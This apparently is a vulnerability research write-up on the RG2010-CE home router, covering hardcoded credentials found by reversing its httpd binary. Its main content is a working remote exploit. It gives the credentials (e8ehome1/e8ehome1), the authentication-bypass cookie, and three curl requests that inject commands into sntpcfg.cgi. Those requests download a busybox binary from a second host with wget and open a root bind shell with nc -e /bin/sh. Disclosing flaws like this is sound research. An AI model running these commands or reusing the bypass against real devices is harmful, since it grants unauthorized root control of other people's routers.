I decided to download the httpd binary and poke around with IDA, after a casual look through the authentication subs I found hardcoded credentials: username e8ehome1, password e8ehome1 which sets the cookie to Name=0e8ehome1, and to my surprise sntpcfg.cgi is available when this cookie is set even if the e8ehome1 user did not log in first! This means we can leverage the hardcoded credentials to execute shell commands as root and bind a shell with nc:
cd /tmp
wget http://192.168.1.132:8000/busybox-mips
chmod +x /tmp/busybox-mips
/tmp/busybox-mips nc -lp 24 -e /bin/sh
Becomes
curl 'http://192.168.1.1/sntpcfg.cgi?localTime_current=bogustime%26cd%20/tmp%26%26wget%20http://192.168.1.132:8000/busybox-mips' -H 'Cookie: Name=0e8ehome1'
curl 'http://192.168.1.1/sntpcfg.cgi?localTime_current=bogustime%26chmod%20%2Bx%20/tmp/busybox-mips' -H 'Cookie: Name=0e8ehome1'
curl 'http://192.168.1.1/sntpcfg.cgi?localTime_current=bogustime%26/tmp/busybox-mips%20nc%20-lp%2024%20-e%20/bin/sh%26' -H 'Cookie: Name=0e8ehome1'
In conclusion
- Using information obtained though the UART I have found a way to get shell access and TelecomAdmin access to the web GUI.
- Through sloppy input validation in the web GUI shell commands could be executed remotely when logged in with elevated privileges.
- Because of hardcoded credentials with elevated privileges shell commands can be executed on any RG2010-CE remotely.